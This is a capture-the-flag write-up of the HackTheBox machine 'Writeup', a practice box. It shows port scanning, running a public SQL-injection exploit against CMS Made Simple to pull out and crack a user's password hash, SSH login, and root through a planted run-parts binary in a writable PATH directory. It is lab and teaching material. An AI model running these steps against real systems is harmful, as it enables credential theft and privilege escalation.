HTB: Writeup

Writeup Card

This article is a writeup about a retired HacktheBox machine: Writeup. (Yes the machine name is writeup, searching a writeup for writeup will be a funny thing.). The machine is classed as an easy one. It involves vulnerability in a known CMS as well as "PATH vulnerability" for the privilege escalation.

Recon

First of all we start by scanning the machine's open ports with nmap. Only port 22 (SSH) and 80 (HTTP) are open:

# Nmap 7.80 scan initiated Sun Sep 22 16:08:28 2019 as: nmap -oA nmap -sSV 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.089s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 22 16:08:43 2019 -- 1 IP address (1 host up) scanned in 15.20 seconds

Web, getting user

The homepage of this website is ugly and say that there is nothing there yet. We take a look to robots.txt:

#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `---''---`

# Disallow access to the blog until content is finished.
User-agent: * 
Disallow: /writeup/

Let's take a look at /writeup/! We have there another website. When looking at the page source code we notice the use of "CMS Made Simple" a CMS with a few vulnerabilities.

<!doctype html>
<html lang="en_US"><head>
  <title>Home - writeup</title>

<base href="http://10.10.10.138/writeup/" />
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

Let's search for exploits, a few of them are available:

# searchsploit 'made simple'
-------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                        |  Path
                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------- ----------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)    | exploits/php/remote/46627.rb
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion                               | exploits/php/webapps/26217.html
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting                               | exploits/php/webapps/26298.txt
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting                            | exploits/php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection                                | exploits/php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities               | exploits/php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities                                     | exploits/php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution                                           | exploits/php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                  | exploits/php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload                      | exploits/php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion                                          | exploits/php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure                                         | exploits/php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting                   | exploits/php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities                                      | exploits/php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery                                      | exploits/php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion                         | exploits/php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery               | exploits/php/webapps/34068.html
CMS Made Simple 2.1.6 - Multiple Vulnerabilities                                      | exploits/php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution                                         | exploits/php/webapps/44192.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                         | exploits/php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                         | exploits/php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning                       | exploits/php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection                                              | exploits/php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload                      | exploits/php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload                 | exploits/php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload        | exploits/php/webapps/46546.py
-------------------------------------------------------------------------------------- ----------------------------------
Shellcodes: No Result

As we are not authenticated, The one that interest us is "CMS Made Simple < 2.2.10 - SQL Injection (exploits/php/webapps/46635.py). We run the exploit (admire the beauty of the display). We then get a username, an email, a password salt and a password hash.

python 46635.py -u http://10.10.10.138/writeup
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

The exploit also allow to crack the password using a dictionary. We run "rockyou" against it and found jkr password.

# python 46635.py --crack -w ./rockyou.txt -u http://10.10.10.138/writeup
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9

With this password we are able to connect to the box using SSH and get the user password:

# ssh jkr@10.10.10.138
jkr@10.10.10.138's password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 22 12:31:00 2019 from 10.10.14.237
jkr@writeup:~$ cat user.txt 
d4e493<redacted>

Root

We enumerate the box without a lot of success. A quick read of the box forum recommend to run pspy on the box. We discover that a script is run every time an user connect with SSH.

2019/09/25 07:39:49 CMD: UID=0    PID=4352   | sshd: [accepted]
2019/09/25 07:39:49 CMD: UID=0    PID=4353   | sshd: [accepted]  
2019/09/25 07:40:01 CMD: UID=0    PID=4354   | sshd: jkr [priv]  
2019/09/25 07:40:01 CMD: UID=0    PID=4355   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 
2019/09/25 07:40:01 CMD: UID=0    PID=4356   | run-parts --lsbsysinit /etc/update-motd.d

The PATH is fixed by the command line and there is no run-parts binary in the first folder /usr/local/sbin. Moreover this folder is writable. Therefore we write a simple file /usr/local/sbin/run-parts and give it the execution permission:

jkr@writeup:~$ vim /usr/local/sbin/run-parts
#!/bin/bash
cat /root/root.txt > /tmp/lool/b
rm /tmp/lool/b

jkr@writeup:~$ chmod +x /usr/local/sbin/run-parts

We create a directory in /tmp/ and write the b file. At the same time be connect by SSH with the jkr user. We get the root flag

jkr@writeup:~$ mkdir /tmp/lool/
jkr@writeup:~$ echo a > /tmp/lool/b
jkr@writeup:~$ tail -f /tmp/lool/b
a
tail: /tmp/lool/b: file truncated
eeba4<redacted>

Wrapping up

The user step implied only to use a know exploit without any change. The privilege escalation was really interesting as I didn't use pspy before.